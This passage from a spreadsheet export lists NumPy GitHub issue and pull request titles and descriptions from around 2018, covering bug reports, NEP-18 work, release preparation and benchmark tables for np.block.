    <t xml:space="preserve">Follow up will be to remove the preceding lines of code, once CI proves this is never hit on any platform._x000D_
_x000D_
This dates way back to 668950285c407593a368336ff2e737c5da84af7d, so probably has just been made redundant by one of the ~10 other loops in this file that try to assign names to types._x000D_
</t>
  </si>
  <si>
    <t>MAINT: Add a RuntimeError to prove _typestr` is unused</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
In Python3, accessing the memory-view of an F-contiguous array yields a `BufferError`. This behavior was supported in Python2. Is this an intended behavior change?_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
This fails in Python3 but it works in Python2_x000D_
```python_x000D_
import numpy as np_x000D_
arr = np.asarray(np.random.randn(20, 10, 5), order='F')_x000D_
from io import BytesIO_x000D_
o = BytesIO(arr.data)_x000D_
```_x000D_
_x000D_
Here are the array flags:_x000D_
```_x000D_
&gt;&gt;&gt; arr.flags_x000D_
  C_CONTIGUOUS : False_x000D_
  F_CONTIGUOUS : True_x000D_
  OWNDATA : True_x000D_
  WRITEABLE : True_x000D_
  ALIGNED : True_x000D_
  WRITEBACKIFCOPY : False_x000D_
  UPDATEIFCOPY : False_x000D_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Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
BufferError: memoryview: underlying buffer is not C-contiguous_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
Python3:_x000D_
```_x000D_
1.15.1 3.6.5 (default, Apr  1 2018, 05:46:30) _x000D_
[GCC 7.3.0]_x000D_
```_x000D_
_x000D_
Python2:_x000D_
```_x000D_
1.14.5, 2.7.15rc1 (default, Apr 15 2018, 21:51:34) _x000D_
[GCC 7.3.0]_x000D_
```_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>memoryview BufferError with F-contiguous arrays in python3</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to implement NEP-18 in a multi-step process:_x000D_
1. (This PR) Pure Python implementation of `__array_function__` machinery,_x000D_
   based on the prototype implementation from NEP-18._x000D_
2. Rewrite this machinery in C as needed to improve performance._x000D_
3. Implement overrides on NumPy functions._x000D_
_x000D_
Steps 2 and 3 should be able to happen in parallel (and with other people_x000D_
contributing!)._x000D_
_x000D_
~~This PR still needs more tests, especially for `ndarray.__array_function__`~~_x000D_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</si>
  <si>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initial implementation of core `__array_function__` machinery</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
- Create new file `test_compile_function.py` for the test, transferring_x000D_
  the content from `test_quoted_characters.py` where it was before. The_x000D_
  tricky part here is maintaining the history in both files after the_x000D_
  move._x000D_
    _x000D_
- The tests were failing on platforms without a fortran compiler as that_x000D_
  was not being checked for. Add that check among others and clean up the_x000D_
  test functions a bit._x000D_
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</si>
  <si>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f2py compile function testing.</t>
  </si>
  <si>
    <t>Reverts numpy/numpy#11934_x000D_
_x000D_
Actually marking this as accepted now after the revisions in https://github.com/numpy/numpy/pull/11943</t>
  </si>
  <si>
    <t>Revert "NEP: Revert "NEP: Mark NEP 18 as accepted""</t>
  </si>
  <si>
    <t xml:space="preserve">The existing benchmarks for block are not easy to understand in terms of what they might mean for common use cases in the case of 2D blocking._x000D_
_x000D_
These benchmarks make the performance of common use cases more clear in terms of final array size and dtype used_x000D_
_x000D_
xref #11991_x000D_
_x000D_
cc: @eric-wieser _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BENCH: Add a relatable 2D benchmark for block</t>
  </si>
  <si>
    <t>['component: benchmarks']</t>
  </si>
  <si>
    <t xml:space="preserve">- Create 1.15.2-notes.rst._x000D_
- Create 1.15.2-changelog.rst._x000D_
- Add 1.14.6-notes.rst_x000D_
- Add 1.14.6-changelog.rst_x000D_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</si>
  <si>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REL: Prepare for NumPy 1.15.2 release.[ci skip]</t>
  </si>
  <si>
    <t>A simple cut-and-paste. I think eventually we can just eliminate these functions from internal use.</t>
  </si>
  <si>
    <t>MAINT: Extract string helpers to a new private file</t>
  </si>
  <si>
    <t xml:space="preserve">Now that we're using parametrize, may as well drop it in a few more places_x000D_
</t>
  </si>
  <si>
    <t>TST: Parametrize and break apart dtype tests</t>
  </si>
  <si>
    <t xml:space="preserve">- The warnings module behavior was changed in Python 3.7, requiring_x000D_
  version dependent changes to the suppress_warnings context manager_x000D_
  tests in the np.testing package._x000D_
-  Add Python 3.7 ci tests. This mostly copies the yml files from Numpy 1.15_x000D_
  with a few changes on account of using nose instead of pytest._x000D_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</si>
  <si>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Add Python 3.7 testing to NumPy 1.14.</t>
  </si>
  <si>
    <t xml:space="preserve">- Create release notes_x000D_
- Create changelog_x000D_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</si>
  <si>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REL: Prepare NumPy 1.14.6 release.[ci skip]</t>
  </si>
  <si>
    <t>Corrects a mistake in gh-11246, where the base for this case was_x000D_
set to the indexed subclass instance (like for a view). Since a_x000D_
copy is made in this case, the base should be the new ndarray that_x000D_
holds the indexed values._x000D_
_x000D_
fixes #11983</t>
  </si>
  <si>
    <t>BUG: Ensure boolean indexing of subclasses sets base correctly.</t>
  </si>
  <si>
    <t xml:space="preserve">This is a small PR that speeds up the case of blocking small arrays by 10-20% in CPython 3.6 by avoiding closures._x000D_
_x000D_
This only makes PR https://github.com/numpy/numpy/pull/11971 a harder sell, but I think these optimizations are worthwhile for people blocking small arrays._x000D_
_x000D_
&lt;details&gt;_x000D_
&lt;summary&gt;Benchmarks Python 3.6 conda(-forge?)&lt;/summary&gt;_x000D_
_x000D_
```_x000D_
       before           after         ratio_x000D_
     [d126ff7a]       [535d337d]_x000D_
     &lt;master&gt;         &lt;block_optimize_order&gt;_x000D_
-      32.8±0.3μs       28.6±0.4μs     0.87  bench_shape_base.Block2D.time_block2d((128, 128), 'uint64', (2, 2))_x000D_
-        67.7±4μs       57.4±0.5μs     0.85  bench_shape_base.Block2D.time_block2d((256, 256), 'uint16', (4, 4))_x000D_
-      27.9±0.1μs       23.4±0.2μs     0.84  bench_shape_base.Block2D.time_block2d((256, 256), 'uint8', (2, 2))_x000D_
-        60.3±4μs       50.7±0.9μs     0.84  bench_shape_base.Block2D.time_block2d((256, 256), 'uint8', (4, 4))_x000D_
-      57.9±0.6μs       48.6±0.7μs     0.84  bench_shape_base.Block2D.time_block2d((128, 128), 'uint32', (4, 4))_x000D_
-        39.1±1μs         32.7±1μs     0.84  bench_shape_base.Block.time_block_complicated(10)_x000D_
-      50.6±0.4μs         42.2±1μs     0.83  bench_shape_base.Block2D.time_block2d((64, 64), 'uint16', (4, 4))_x000D_
-      35.7±0.8μs       29.6±0.4μs     0.83  bench_shape_base.Block.time_no_lists(100)_x000D_
-      53.9±0.4μs       44.6±0.3μs     0.83  bench_shape_base.Block2D.time_block2d((128, 128), 'uint16', (4, 4))_x000D_
-        65.1±2μs       53.7±0.6μs     0.82  bench_shape_base.Block2D.time_block2d((128, 128), 'uint64', (4, 4))_x000D_
-        23.3±1μs       19.1±0.1μs     0.82  bench_shape_base.Block2D.time_block2d((64, 64), 'uint64', (2, 2))_x000D_
-      53.6±0.6μs       43.7±0.4μs     0.82  bench_shape_base.Block2D.time_block2d((64, 64), 'uint64', (4, 4))_x000D_
-      27.5±0.5μs       22.4±0.2μs     0.81  bench_shape_base.Block2D.time_block2d((128, 128), 'uint32', (2, 2))_x000D_
-      41.0±0.2μs       33.2±0.3μs     0.81  bench_shape_base.Block.time_3d(1)_x000D_
-        35.4±1μs       28.6±0.3μs     0.81  bench_shape_base.Block2D.time_block2d((256, 256), 'uint16', (2, 2))_x000D_
-      22.1±0.5μs       17.6±0.2μs     0.80  bench_shape_base.Block2D.time_block2d((64, 64), 'uint32', (2, 2))_x000D_
-        49.8±1μs       39.4±0.4μs     0.79  bench_shape_base.Block2D.time_block2d((32, 32), 'uint8', (4, 4))_x000D_
-      11.7±0.5μs       9.23±0.4μs     0.79  bench_shape_base.Block.time_no_lists(10)_x000D_
-        52.3±3μs       40.8±0.3μs     0.78  bench_shape_base.Block2D.time_block2d((32, 32), 'uint64', (4, 4))_x000D_
-      17.5±0.5μs       13.6±0.2μs     0.78  bench_shape_base.Block.time_block_simple_column_wise(10)_x000D_
-        37.3±1μs       28.9±0.2μs     0.77  bench_shape_base.Block.time_block_complicated(1)_x000D_
-        23.1±1μs       17.8±0.2μs     0.77  bench_shape_base.Block2D.time_block2d((128, 128), 'uint8', (2, 2))_x000D_
-      21.7±0.8μs       16.7±0.1μs     0.77  bench_shape_base.Block2D.time_block2d((64, 64), 'uint16', (2, 2))_x000D_
-      11.1±0.5μs       8.48±0.1μs     0.76  bench_shape_base.Block.time_no_lists(1)_x000D_
-      21.2±0.7μs      16.1±0.08μs     0.76  bench_shape_base.Block2D.time_block2d((32, 32), 'uint32', (2, 2))_x000D_
-        55.5±4μs       42.1±0.5μs     0.76  bench_shape_base.Block2D.time_block2d((64, 64), 'uint32', (4, 4))_x000D_
-        56.4±1μs       42.6±0.1μs     0.75  bench_shape_base.Block2D.time_block2d((128, 128), 'uint8', (4, 4))_x000D_
-      26.1±0.7μs       19.7±0.2μs     0.75  bench_shape_base.Block2D.time_block2d((128, 128), 'uint16', (2, 2))_x000D_
-      21.0±0.3μs       15.8±0.3μs     0.75  bench_shape_base.Block2D.time_block2d((16, 16), 'uint32', (2, 2))_x000D_
-        53.2±1μs       39.7±0.7μs     0.75  bench_shape_base.Block2D.time_block2d((16, 16), 'uint32', (4, 4))_x000D_
-        52.4±2μs       39.1±0.4μs     0.75  bench_shape_base.Block2D.time_block2d((16, 16), 'uint8', (4, 4))_x000D_
-      21.5±0.1μs       15.9±0.2μs     0.74  bench_shape_base.Block2D.time_block2d((16, 16), 'uint64', (2, 2))_x000D_
-      22.1±0.5μs       16.3±0.1μs     0.74  bench_shape_base.Block2D.time_block2d((64, 64), 'uint8', (2, 2))_x000D_
-        53.4±2μs       39.4±0.3μs     0.74  bench_shape_base.Block2D.time_block2d((32, 32), 'uint16', (4, 4))_x000D_
-      10.5±0.2μs       7.71±0.1μs     0.73  bench_shape_base.Block.time_block_simple_row_wise(10)_x000D_
-      21.0±0.2μs       15.2±0.1μs     0.73  bench_shape_base.Block2D.time_block2d((16, 16), 'uint8', (2, 2))_x000D_
-        54.4±2μs       38.9±0.4μs     0.72  bench_shape_base.Block2D.time_block2d((16, 16), 'uint16', (4, 4))_x000D_
-        57.1±1μs       40.8±0.4μs     0.71  bench_shape_base.Block2D.time_block2d((64, 64), 'uint8', (4, 4))_x000D_
-        55.6±3μs       39.7±0.4μs     0.71  bench_shape_base.Block2D.time_block2d((16, 16), 'uint64', (4, 4))_x000D_
-      22.2±0.4μs      15.8±0.09μs     0.71  bench_shape_base.Block2D.time_block2d((32, 32), 'uint16', (2, 2))_x000D_
-      23.1±0.2μs       16.4±0.1μs     0.71  bench_shape_base.Block2D.time_block2d((32, 32), 'uint64', (2, 2))_x000D_
-      22.2±0.7μs       15.7±0.1μs     0.70  bench_shape_base.Block2D.time_block2d((32, 32), 'uint8', (2, 2))_x000D_
-        22.2±2μs       15.4±0.6μs     0.69  bench_shape_base.Block2D.time_block2d((16, 16), 'uint16', (2, 2))_x000D_
-        58.1±5μs       40.1±0.4μs     0.69  bench_shape_base.Block2D.time_block2d((32, 32), 'uint32', (4, 4))_x000D_
```_x000D_
&lt;/details&gt;_x000D_
_x000D_
&lt;details&gt;_x000D_
&lt;summary&gt;Benchmarks python 3.5 conda(-forge?)&lt;/summary&gt;_x000D_
_x000D_
```_x000D_
_x000D_
       before           after         ratio_x000D_
     [d126ff7a]       [91391c1a]_x000D_
     &lt;master&gt;         &lt;block_optimize_order&gt;_x000D_
-       59.6±10μs       47.4±0.8μs     0.79  bench_shape_base.Block2D.time_block2d((512, 512), 'uint8', (2, 2))_x000D_
-        78.1±1μs         60.6±2μs     0.78  bench_shape_base.Block2D.time_block2d((256, 256), 'uint16', (4, 4))_x000D_
-        57.7±5μs         44.2±1μs     0.77  bench_shape_base.Block2D.time_block2d((32, 32), 'uint16', (4, 4))_x000D_
-        57.7±3μs         43.8±1μs     0.76  bench_shape_base.Block2D.time_block2d((64, 64), 'uint8', (4, 4))_x000D_
-        55.5±3μs       42.1±0.6μs     0.76  bench_shape_base.Block2D.time_block2d((16, 16), 'uint32', (4, 4))_x000D_
-        63.0±6μs         46.0±4μs     0.73  bench_shape_base.Block2D.time_block2d((64, 64), 'uint16', (4, 4))_x000D_
-        27.9±4μs         20.2±1μs     0.72  bench_shape_base.Block2D.time_block2d((64, 64), 'uint64', (2, 2))_x000D_
-        111±20μs         79.7±2μs     0.72  bench_shape_base.Block2D.time_block2d((512, 512), 'uint8', (4, 4))_x000D_
-        59.1±1μs       41.4±0.7μs     0.70  bench_shape_base.Block2D.time_block2d((16, 16), 'uint16', (4, 4))_x000D_
-        71.3±5μs         49.6±2μs     0.70  bench_shape_base.Block2D.time_block2d((128, 128), 'uint8', (4, 4))_x000D_
-        21.5±3μs      14.4±0.07μs     0.67  bench_shape_base.Block2D.time_block2d((16, 16), 'uint8', (2, 2))_x000D_
-        66.3±3μs         44.1±1μs     0.67  bench_shape_base.Block2D.time_block2d((64, 64), 'uint64', (4, 4))_x000D_
-        63.5±7μs       41.7±0.3μs     0.66  bench_shape_base.Block2D.time_block2d((64, 64), 'uint32', (4, 4))_x000D_
```_x000D_
&lt;/details&gt;_x000D_
_x000D_
&lt;details&gt;_x000D_
&lt;summary&gt;Benchmarks Python 2.7 conda(-forge)&lt;/summary&gt;_x000D_
_x000D_
```_x000D_
       before           after         ratio_x000D_
     [d126ff7a]       [91391c1a]_x000D_
     &lt;master&gt;         &lt;block_optimize_order&gt;_x000D_
-      28.8±0.4μs       25.4±0.2μs     0.88  bench_shape_base.Block2D.time_block2d((256, 256), 'uint16', (2, 2))_x000D_
-        68.8±2μs         60.2±1μs     0.87  bench_shape_base.Block2D.time_block2d((256, 256), 'uint32', (4, 4))_x000D_
-      42.1±0.7μs       36.9±0.4μs     0.87  bench_shape_base.Block2D.time_block2d((128, 128), 'uint8', (4, 4))_x000D_
-        42.2±1μs       36.4±0.7μs     0.86  bench_shape_base.Block2D.time_block2d((256, 256), 'uint32', (2, 2))_x000D_
-      52.5±0.3μs       45.3±0.4μs     0.86  bench_shape_base.Block2D.time_block2d((128, 128), 'uint64', (4, 4))_x000D_
-      48.1±0.4μs       41.1±0.3μs     0.86  bench_shape_base.Block2D.time_block2d((256, 256), 'uint8', (4, 4))_x000D_
-      46.9±0.3μs       39.7±0.3μs     0.85  bench_shape_base.Block2D.time_block2d((128, 128), 'uint32', (4, 4))_x000D_
-      22.1±0.2μs       18.6±0.4μs     0.84  bench_shape_base.Block2D.time_block2d((128, 128), 'uint32', (2, 2))_x000D_
-      37.3±0.2μs       31.4±0.7μs     0.84  bench_shape_base.Block2D.time_block2d((16, 16), 'uint8', (4, 4))_x000D_
-      23.9±0.3μs       20.2±0.1μs     0.84  bench_shape_base.Block2D.time_block2d((256, 256), 'uint8', (2, 2))_x000D_
-      38.0±0.5μs       32.0±0.5μs     0.84  bench_shape_base.Block2D.time_block2d((32, 32), 'uint8', (4, 4))_x000D_
-      42.6±0.4μs       35.9±0.4μs     0.84  bench_shape_base.Block2D.time_block2d((64, 64), 'uint64', (4, 4))_x000D_
-      43.4±0.4μs       36.3±0.3μs     0.84  bench_shape_base.Block2D.time_block2d((128, 128), 'uint16', (4, 4))_x000D_
-      40.8±0.2μs       34.2±0.4μs     0.84  bench_shape_base.Block2D.time_block2d((64, 64), 'uint32', (4, 4))_x000D_
-      19.3±0.2μs       16.0±0.2μs     0.83  bench_shape_base.Block2D.time_block2d((128, 128), 'uint16', (2, 2))_x000D_
-      17.5±0.1μs       14.5±0.1μs     0.83  bench_shape_base.Block2D.time_block2d((128, 128), 'uint8', (2, 2))_x000D_
-      40.3±0.6μs       33.4±0.2μs     0.83  bench_shape_base.Block2D.time_block2d((64, 64), 'uint16', (4, 4))_x000D_
-      37.8±0.2μs       31.2±0.3μs     0.83  bench_shape_base.Block2D.time_block2d((16, 16), 'uint16', (4, 4))_x000D_
-      17.8±0.4μs       14.7±0.2μs     0.83  bench_shape_base.Block2D.time_block2d((64, 64), 'uint32', (2, 2))_x000D_
-      18.6±0.2μs       15.3±0.1μs     0.83  bench_shape_base.Block2D.time_block2d((64, 64), 'uint64', (2, 2))_x000D_
-      39.1±0.9μs       31.9±0.5μs     0.82  bench_shape_base.Block2D.time_block2d((16, 16), 'uint64', (4, 4))_x000D_
-      15.8±0.4μs       12.9±0.1μs     0.81  bench_shape_base.Block2D.time_block2d((32, 32), 'uint32', (2, 2))_x000D_
-      14.8±0.4μs       12.0±0.3μs     0.81  bench_shape_base.Block2D.time_block2d((16, 16), 'uint8', (2, 2))_x000D_
-      16.3±0.2μs       13.2±0.4μs     0.81  bench_shape_base.Block2D.time_block2d((32, 32), 'uint16', (2, 2))_x000D_
-     15.9±0.05μs      12.8±0.09μs     0.80  bench_shape_base.Block2D.time_block2d((64, 64), 'uint8', (2, 2))_x000D_
```_x000D_
_x000D_
&lt;/details&gt;_x000D_
_x000D_
Pinging @eric-wieser  who helped me with #11971_x000D_
and @jakirkham and @j-towns who contributed to np.block in #9667._x000D_
</t>
  </si>
  <si>
    <t>MAINT: speed up `_block` by avoiding a recursive closure</t>
  </si>
  <si>
    <t>Fixes #11951. Variable were initialized but never `decref`ed. I am not sure how to write a test since they are new instances that never escape out of the local function, so `sys.get_refcount` cannot see them. Do they somehow show up in the `gc` module on CPython?</t>
  </si>
  <si>
    <t>BUG: fix refcount leak in PyArray_AdaptFlexibleDType</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11298._x000D_
_x000D_
This change was introduced as part of #10232_x000D_
_x000D_
Fixes #11112_x000D_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</si>
  <si>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Undo behavior change in ma.masked_values(shrink=True)</t>
  </si>
  <si>
    <t>There currently only is a global cache for small allocations so thefunctions must be called while the GIL is held. Ensure this by checking the GIL state in debug mode (which is tested via a ci configuration)._x000D_
Closes gh-11942</t>
  </si>
  <si>
    <t>BUG: fix cached allocations without the GIL</t>
  </si>
  <si>
    <t>Codecov is comment-spamming PRs</t>
  </si>
  <si>
    <t>In https://github.com/astropy/astropy/issues/7831, we got a report of a memory leak when indexing an astropy `Column` object (which is an ndarray subclass) with a boolean array: the result keeps a link to the original. It seems this is a problem for every ndarray subclass:_x000D_
```python_x000D_
import numpy as np_x000D_
class MyA(np.ndarray):_x000D_
    pass_x000D_
_x000D_
a = np.arange(4).view(MyA)_x000D_
b = a[a&gt;1]_x000D_
b.base_x000D_
# MyA([0, 1, 2, 3])_x000D_
b.base is a_x000D_
# True_x000D_
```_x000D_
If instead I use a plain array, `b.base is None`, as expected. If I try with numpy 1.14.5, then `b.base` is correctly the plain array with elements larger than 1._x000D_
_x000D_
I somewhat suspect #11246, hence CC @eric-wieser (and CC myself as the reviewer...)</t>
  </si>
  <si>
    <t>BUG: taking boolean indices of ndarray subclass leaves wrong link in `base`</t>
  </si>
  <si>
    <t>Backport of #11973._x000D_
_x000D_
There currently only is a global cache for small allocations so the functions _x000D_
must be called while the GIL is held. Ensure this by checking the GIL state_x000D_
in debug mode (which is tested via a ci configuration).</t>
  </si>
  <si>
    <t>BUG: fix cached allocations without the GIL for 1.15.x</t>
  </si>
  <si>
    <t>With the impending demise of `exec_command()` related to #11824, there will soon only be unit tests that call this function in our code base even though it will no longer be used._x000D_
_x000D_
The unit tests are in `numpy/distutils/tests/test_exec_command.py` -- will we want to remove the tests that specifically call `exec_command()`?  I assume we won't want to unit test the standard library stuff we've replaced `exec_command()` with._x000D_
_x000D_
Also, do we need a deprecation marker of some sort on `exec_command()` before removing it? I'm not sure how public-facing / used it is; maybe I need to check that deprecation policy NEP again!</t>
  </si>
  <si>
    <t>MAINT: exec_command() cleanup</t>
  </si>
  <si>
    <t>In the case that a user calls_x000D_
np.block(array),_x000D_
the old block function would return a view into the array._x000D_
_x000D_
This ensures that a new array is returned_x000D_
@eric-wieser _x000D_
_x000D_
~~In thinking about this, I realized that we can probably use this to our advantage and just avoid calling concatenate (which forcibly copies the array).~~_x000D_
_x000D_
~~This should help the performance when somebody calls `np.block([[[[[a]]]]])`.~~_x000D_
_x000D_
Developed in light of recent benchmarking results discussed in: https://github.com/numpy/numpy/pull/11971#issuecomment-422508525</t>
  </si>
  <si>
    <t>MAINT: Ensure that a copy of the array is returned when calling `block`.</t>
  </si>
  <si>
    <t>approximate function by a Chebyshev series</t>
  </si>
  <si>
    <t>Issue #11867 demonstrated a leak when using `np.vectorize` on a bound class method in CPython 3. The test demonstrates the issue._x000D_
_x000D_
~Still WIP since I have not found the root cause of the leak.~_x000D_
_x000D_
Edit: adding GC_Track to ufunc allows the garbage collector to break the cycle</t>
  </si>
  <si>
    <t>BUG: reference cycle in np.vectorize</t>
  </si>
  <si>
    <t>Spun out of #11971</t>
  </si>
  <si>
    <t xml:space="preserve"> MAINT/DOC: Show the location of an empty list in np.block</t>
  </si>
  <si>
    <t>&lt;!--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```python_x000D_
import numpy as np_x000D_
import pandas as pd_x000D_
_x000D_
ri = pd.RangeIndex(2)_x000D_
print('before permutation:', ri.values)_x000D_
_x000D_
while True:_x000D_
    idx = np.random.permutation(ri)_x000D_
    if idx[0] == 1:_x000D_
        break_x000D_
    _x000D_
print('after permutation:', ri.values)_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
Running the code outputs the following:_x000D_
_x000D_
before permutation: [0 1]_x000D_
after permutation: [1 0]_x000D_
_x000D_
np.random.permutation should not change input based on manual._x000D_
_x000D_
The code behavior correctly if change the code to_x000D_
_x000D_
    idx = np.random.permutation(ri.values)_x000D_
_x000D_
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1.15.1 3.6.5 |Anaconda, Inc.| (default, Mar 29 2018, 13:32:41) [MSC v.1900 64 bit (AMD64)]_x000D_
``</t>
  </si>
  <si>
    <t>BUG: numpy.random.permutation works inplace</t>
  </si>
  <si>
    <t>The simple `pip3 install numpy` worked the first time I tried it on this RHEL6 system. Then I added the `atlas-devel` (and `atlas`) packages via yum, uninstalled and tried installing it again._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
`pip3 install numpy`_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
_x000D_
The error is triggered by an attempt to pass `-DATLAS_INFO="\"3.8.4\""` to the compiler. Somehow this results in a bunch of "unmatched quote" errors._x000D_
_x000D_
I'm including the full output of the (failed) install: _x000D_
[numpy-install.log](https://github.com/numpy/numpy/files/2390146/numpy-install.log). It ends with:_x000D_
_x000D_
`error: Command "/prod/pfe/local/bin/gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -O3 -march=native -pipe -O3 -march=native -pipe -fPIC -DNPY_INTERNAL_BUILD=1 -DHAVE_NPY_CONFIG_H=1 -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE=1 -D_LARGEFILE64_SOURCE=1 -DHAVE_CBLAS -DATLAS_INFO="\"3.8.4\"" -I/usr/include -Ibuild/src.linux-x86_64-3.6/numpy/core/src/private -Inumpy/core/include -Ibuild/src.linux-x86_64-3.6/numpy/core/include/numpy -Inumpy/core/src/private -Inumpy/core/src -Inumpy/core -Inumpy/core/src/npymath -Inumpy/core/src/multiarray -Inumpy/core/src/umath -Inumpy/core/src/npysort -I/prod/pfe/local/include/python3.6 -Ibuild/src.linux-x86_64-3.6/numpy/core/src/private -Ibuild/src.linux-x86_64-3.6/numpy/core/src/npymath -Ibuild/src.linux-x86_64-3.6/numpy/core/src/private -Ibuild/src.linux-x86_64-3.6/numpy/core/src/npymath -Ibuild/src.linux-x86_64-3.6/numpy/core/src/private -Ibuild/src.linux-x86_64-3.6/numpy/core/src/npymath -c numpy/core/src/multiarray/temp_elide.c -o build/temp.linux-x86_64-3.6/numpy/core/src/multiarray/temp_elide.o -MMD -MF build/temp.linux-x86_64-3.6/numpy/core/src/multiarray/temp_elide.o.d" failed with exit status 1`_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
Trying to install the latest numpy (1.15.1 at this time). Python-3.6.6.</t>
  </si>
  <si>
    <t>Trying to install Numpy with ATLAS already present fails with "mismatched quote</t>
  </si>
  <si>
    <t>['00 - Bug', '50 - Duplicate', 'component: numpy.distutils']</t>
  </si>
  <si>
    <t>Block used to make repeated calls to concatenate. For a 3D block, this would copy the arrays 3 times. 1 time for each dimension of the block. This is 2 times too many._x000D_
_x000D_
This proposed algorithm does so with 1 memory copy. _x000D_
_x000D_
Wisdom allows numpy to guess which algorithm is better performing and chooses that one automatically. We can add a switch, to let the user decide._x000D_
_x000D_
TODO:_x000D_
- [x] Add tests that trigger both code paths._x000D_
- [x] Ensure that the docstrings are sensible._x000D_
- [x] Decide on how to test the other branch of block function._x000D_
- [x] Decide on how to treat F order matricies (or mixes of dimensions)._x000D_
- [x] Decide on how to deal with masked array objects. concatenate supports them. Seems like we still don't know how to deal with subclasses. See https://github.com/numpy/numpy/issues/8881 and  https://github.com/numpy/numpy/issues/9270_x000D_
_x000D_
XREF: Other issues I found regarding concatenate that we might want to test for_x000D_
- endianness: https://github.com/numpy/numpy/issues/7829 -- should test_x000D_
- Empty lists: https://github.com/numpy/numpy/issues/1586  -- Block doesn't support empty lists_x000D_
- F/C ordering: See https://github.com/numpy/numpy/pull/11971#discussion_r223183338, and previous https://github.com/numpy/numpy/pull/9209#discussion_r138170238 and issue https://github.com/numpy/numpy/pull/2696_x000D_
_x000D_
The general steps are:_x000D_
1. Sanitize the input._x000D_
1. Cast each block as a numpy array of the final dimension_x000D_
2. Calculate the shape of each block_x000D_
3. Concatenate the shapes_x000D_
5. Keep track of the slice of a particular block within the larger whole._x000D_
4. Combines dtypes to find the `dtype` of the result._x000D_
6. Create the new array._x000D_
7. Copy the blocks in._x000D_
_x000D_
A benchmark was added to estimate the 2D blocking performance in a straightforward manner._x000D_
_x000D_
# Approach details_x000D_
# 2D results_x000D_
For small arrays, this approach seems to suffer from large overhead. Benchmarks show that "small arrays" are anything as large as `256x256` arrays a modern i7 from 2017._x000D_
_x000D_
The performance of `master` is optimized in PR #11991.  This shaves the overhead time for a 2x2 block from 20us to 15 us. Benchmarks in this section are compared to that PR. The overhead for this method is 30 us when blocking a small 2x2 array._x000D_
_x000D_
My general sense is that small arrays are pretty important. While the `concatenate` approach was "wasteful" for large arrays, it was quick for small arrays. There is probably room for both approaches._x000D_
_x000D_
&lt;details&gt;_x000D_
&lt;summary&gt;Benchmark results compared to PR #11991 &lt;/summary&gt;_x000D_
_x000D_
```_x000D_
       before           after         ratio_x000D_
     [1af752aa]       [0b1d866f]_x000D_
     &lt;block_optimize_order&gt;       &lt;block_single_assignment&gt;_x000D_
+      15.6±0.3μs       30.0±0.8μs     1.92  bench_shape_base.Block2D.time_block2d((16, 16), 'uint8', (2, 2))_x000D_
+     15.8±0.08μs         30.2±1μs     1.91  bench_shape_base.Block2D.time_block2d((16, 16), 'uint32', (2, 2))_x000D_
+      39.4±0.2μs         73.1±2μs     1.85  bench_shape_base.Block2D.time_block2d((32, 32), 'uint8', (4, 4))_x000D_
+      16.9±0.3μs         31.1±1μs     1.84  bench_shape_base.Block2D.time_block2d((32, 32), 'uint64', (2, 2))_x000D_
+      16.8±0.3μs       31.0±0.9μs     1.84  bench_shape_base.Block2D.time_block2d((32, 32), 'uint32', (2, 2))_x000D_
+      40.3±0.3μs       73.7±0.9μs     1.83  bench_shape_base.Block2D.time_block2d((32, 32), 'uint16', (4, 4))_x000D_
+      16.4±0.6μs       29.8±0.7μs     1.82  bench_shape_base.Block2D.time_block2d((32, 32), 'uint8', (2, 2))_x000D_
+      16.9±0.3μs       30.8±0.9μs     1.82  bench_shape_base.Block2D.time_block2d((32, 32), 'uint16', (2, 2))_x000D_
+      39.6±0.7μs       71.8±0.9μs     1.81  bench_shape_base.Block2D.time_block2d((16, 16), 'uint8', (4, 4))_x000D_
+      16.2±0.3μs       29.3±0.5μs     1.81  bench_shape_base.Block2D.time_block2d((16, 16), 'uint16', (2, 2))_x000D_
+      16.6±0.1μs       30.0±0.3μs     1.80  bench_shape_base.Block2D.time_block2d((64, 64), 'uint8', (2, 2))_x000D_
+      41.4±0.3μs         74.5±2μs     1.80  bench_shape_base.Block2D.time_block2d((16, 16), 'uint32', (4, 4))_x000D_
+      42.3±0.7μs         75.7±2μs     1.79  bench_shape_base.Block2D.time_block2d((32, 32), 'uint64', (4, 4))_x000D_
+      16.6±0.6μs       29.7±0.4μs     1.79  bench_shape_base.Block2D.time_block2d((16, 16), 'uint64', (2, 2))_x000D_
+      18.1±0.1μs       32.3±0.8μs     1.79  bench_shape_base.Block2D.time_block2d((64, 64), 'uint32', (2, 2))_x000D_
+      17.3±0.6μs       30.9±0.3μs     1.78  bench_shape_base.Block2D.time_block2d((64, 64), 'uint16', (2, 2))_x000D_
+      41.7±0.6μs         74.2±2μs     1.78  bench_shape_base.Block2D.time_block2d((64, 64), 'uint16', (4, 4))_x000D_
+      40.8±0.9μs       72.0±0.7μs     1.77  bench_shape_base.Block2D.time_block2d((16, 16), 'uint16', (4, 4))_x000D_
+      42.7±0.4μs       75.0±0.3μs     1.76  bench_shape_base.Block2D.time_block2d((64, 64), 'uint32', (4, 4))_x000D_
+        41.9±1μs         72.9±2μs     1.74  bench_shape_base.Block2D.time_block2d((16, 16), 'uint64', (4, 4))_x000D_
